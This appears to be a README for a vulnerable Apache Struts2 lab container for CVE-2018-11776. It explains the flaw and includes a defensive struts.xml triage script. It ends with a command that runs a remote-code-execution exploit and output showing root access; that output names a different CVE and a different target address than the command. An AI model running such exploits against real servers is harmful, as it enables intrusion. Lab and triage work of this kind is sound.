This is based on https://github.com/hook-s3c/CVE-2018-11776-Python-PoC. The container build and instructions in that repository did not work as described in its README, so this fork was created. The PoC exploit used here is the one from Rapid7.
Shoutout:
hook-s3c (github.com/hook-s3c), @hook_s3c on twitter
Rapid7 rapid7/metasploit-framework#8064
Man Yue Mo from Semmle disclosed a Struts2 remote code execution vulnerability (CVE-2018-11776, S2-057): an OGNL expression placed in the namespace portion of a request's URL path gets evaluated by the server.
Affected versions are 2.3 through 2.3.34 and 2.5 through 2.5.16.
The default configuration is not vulnerable. The application has to set struts.mapper.alwaysSelectFullNamespace to true and define actions without a namespace (or with a wildcard namespace) for the injected namespace to reach OGNL evaluation. This container, and many real deployments, are configured that way and are vulnerable.
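The two conditions above (an affected version plus the alwaysSelectFullNamespace / missing-namespace configuration) are what you actually check when triaging a Struts deployment. The following is an added example, not code from this repository, from hook-s3c's PoC or from the Rapid7 module: a small Python triage script that parses a struts.xml and reports those conditions. The sample struts.xml embedded in it is constructed for the demonstration, not copied from the container.

```python
# Added example: triage a Struts2 deployment for CVE-2018-11776 / S2-057 exposure.
# Not part of the original PoC repository; the sample config below is constructed.
import re
import xml.etree.ElementTree as ET

# Affected ranges from the advisory: 2.3 to 2.3.34 and 2.5 to 2.5.16 (inclusive).
AFFECTED_RANGES = (((2, 3, 0), (2, 3, 34)), ((2, 5, 0), (2, 5, 16)))


def parse_version(version):
    """Turn '2.5.16', '2.3' or 'struts2-core-2.3.34.jar' into a (major, minor, patch) tuple."""
    m = re.search(r"(\d+)\.(\d+)(?:\.(\d+))?", version)
    if not m:
        raise ValueError("no version number in %r" % version)
    major, minor, patch = m.groups()
    return (int(major), int(minor), int(patch or 0))


def is_affected_version(version):
    """True if the version falls inside one of the advisory's affected ranges."""
    v = parse_version(version)
    return any(lo <= v <= hi for lo, hi in AFFECTED_RANGES)


def namespace_findings(struts_xml):
    """Return (alwaysSelectFullNamespace, [(package, action, namespace), ...]).

    The list holds actions whose package has no namespace attribute (or an empty
    one) or a wildcard namespace. Together with the constant set to true, these
    are the conditions under which an attacker-supplied namespace is used as OGNL.
    Treating an empty namespace like a missing one is a heuristic; both fall back
    to the default namespace.
    """
    root = ET.fromstring(struts_xml)
    full_ns = any(
        c.get("name") == "struts.mapper.alwaysSelectFullNamespace"
        and (c.get("value") or "").strip().lower() == "true"
        for c in root.iter("constant")
    )
    findings = []
    for pkg in root.iter("package"):
        ns = pkg.get("namespace")
        if ns is None or ns == "" or "*" in ns:
            for action in pkg.findall("action"):
                findings.append((pkg.get("name"), action.get("name"), ns))
    return full_ns, findings


def triage(version, struts_xml):
    """Combine the version and configuration checks into one verdict."""
    affected = is_affected_version(version)
    full_ns, findings = namespace_findings(struts_xml)
    return {
        "affected_version": affected,
        "alwaysSelectFullNamespace": full_ns,
        "risky_actions": findings,
        # Only call it likely exploitable when every condition from the advisory holds.
        "likely_exploitable": affected and full_ns and bool(findings),
    }


# Constructed sample struts.xml for the demonstration (not from the container image).
SAMPLE_STRUTS_XML = """<?xml version="1.0" encoding="UTF-8"?>
<struts>
  <constant name="struts.mapper.alwaysSelectFullNamespace" value="true"/>
  <package name="default" extends="struts-default">
    <action name="index" class="demo.IndexAction"/>
  </package>
  <package name="wild" namespace="/*" extends="struts-default">
    <action name="help" class="demo.HelpAction"/>
  </package>
  <package name="admin" namespace="/admin" extends="struts-default">
    <action name="login" class="demo.LoginAction"/>
  </package>
</struts>
"""

if __name__ == "__main__":
    import json
    print(json.dumps(triage("2.5.16", SAMPLE_STRUTS_XML), indent=2))
```

Run it against a real struts.xml with `triage(version, open("struts.xml").read())`; the version string can be the bare number from the Maven POM or the struts2-core jar filename. The check covers the two conditions named in the advisory and nothing else, so a "False" verdict is not proof of safety: other namespace-less constructs (for example redirect-style results without a namespace) were also reported as affected, and a patched 2.3.35 / 2.5.17 is the actual fix.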
It's preferable to build the container from the Dockerfile when you can, so you can see what goes into the build.
git clone https://github.com/freshdemo/ApacheStruts-CVE-2018-11776 ./Struts
cd Struts
docker build . -t freshdemo/apachestruts
Find the new container with
docker images
The output should be similar to this, where you can get the image ID.
root@DockerHost:~/ApacheStruts-CVE-2018-11776# docker images
REPOSITORY               TAG      IMAGE ID       CREATED              SIZE
freshdemo/apachestruts   latest   6586cedf49fa   About a minute ago   542MB
Start a container from the image with the following. The tag from the build step works, or use the image ID from your own docker images output (the ID differs per build, so don't copy the one from the listing above).
docker run -d --name apachestruts -p 8080:8080 freshdemo/apachestruts
Make sure any firewalls between you and the Docker host permit the port you mapped (8080), then run the exploit against the target, substituting your Docker host's address for 192.168.2.188.
python struts.py http://192.168.2.188:8080 'id'
Your output should be similar to this. The uid=0 line is the output of the command run inside the container. The script's banner still names CVE-2017-5638 / S2-045; that is a stale label in the script, not the vulnerability being exercised.
root@k:/home/s# python struts.py http://192.168.2.188:8080 'id'
[*] CVE: 2017-5638 - Apache Struts2 S2-045
http://13.88.250.188:8080 :
[*] cmd: id
uid=0(root) gid=0(root) groups=0(root)